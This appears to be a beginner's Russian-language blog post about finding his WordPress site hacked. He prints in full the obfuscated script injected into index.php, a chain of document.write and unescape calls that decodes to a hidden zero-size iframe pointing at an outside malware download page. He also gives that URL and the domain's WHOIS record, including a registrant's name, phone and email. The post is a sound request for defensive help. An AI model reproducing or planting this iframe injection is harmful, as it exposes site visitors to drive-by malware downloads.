Home / Archives for arahnis

arahnis

Вредоносный скрипт!

Я начинающий в Веб , и для учебы мне посоветовали создать партнерский сайт и его уже "мучить" :).
Вообщем суть не в том. Пару дней назад ,для пробы, я открыл сайт playfast.net.ru . Сегодня захожу на сайт и вижу что в браузере открываются формы для загрузки какихто pdf файлов , понимаю что сайт взломали со старта 😀 . После копания в коде обнаружил что ктото приписал в конец файла index.php этот скрипт : 

</div><script>document.write(unescape('%3C')+unescape('%69')+unescape('%66%72')
+unescape('%61%6D')+unescape('%65%20%73%72')+unescape('%63%3D%22')
+unescape('%68')+unescape('%74')+unescape('%74')+unescape('%70')
+unescape('%3A%2F%2F%6F')+unescape('%79%34%62')
+unescape('%2D%6F%79')+unescape('%6B%62%2E')+unescape('%72%75%2F%75')
+unescape('%70')+unescape('%2E')+unescape('%68%74%6D')+unescape('%6C')
+unescape('%22')+unescape('%20%77')+unescape('%69%64')+unescape('%74')+unescape('%68')
+unescape('%3D%22%30%22')+unescape('%20')+unescape('%68%65%69')
+unescape('%67%68%74%3D')+unescape('%22')+unescape('%30')+unescape('%22')
+unescape('%20%66%72%61')+unescape('%6D%65%62%6F')+unescape('%72')+unescape('%64')
+unescape('%65%72%3D')+unescape('%22%30')+unescape('%22%3E%3C')+unescape('%2F')
+unescape('%69%66%72')+unescape('%61%6D%65%3E')+'');</script>

после расшифровки кода получил эту ссылку (хттп://oy4b-oykb.ru/up.html ) при заходе по которой предлагается скачать некие файлы. Потом пробил домен через рипн :

domain:     OY4B-OYKB.RU
type:       CORPORATE
nserver:    ns1.exthost.biz.
nserver:    ns2.exthost.biz.
state:      REGISTERED, DELEGATED
person:     Miroslav J Babenko
phone:      +7 495 4563768
fax-no:     +7 495 4563768
e-mail:     77@id.ru
registrar:  NAUNET-REG-RIPN
created:    2008.06.18
paid-till:  2009.06.18
source:     TC-RIPN

Самое интересное что по логам вход на сайт был только с моих ip чмод на index.php был 644, сейчас изменил на 444 , пароль к аккаунту на хостинге довольно длинный 😀 "если так можно выразится " его подобрать нереально.

Вообщем вопрос – что это за атака? Как защитится от подобного в будущем ? И что делать с атакующим , обращатся ли к его хостеру, или оставить все как есть изза бессмысленности моих действий в данном направлении?

P.S. Еще раз повторю , по логам , в админку на сайт , и к хостеру никто кроме меня не заходил. Соответственно ,я так понимаю, была использована какаято дыра в WordPress 2.6.5. Интересно какая?

0
Просмотров: 1942
Коментарии: 5
arahnis

Свежее

Anonymous
Отправить
Ответ на: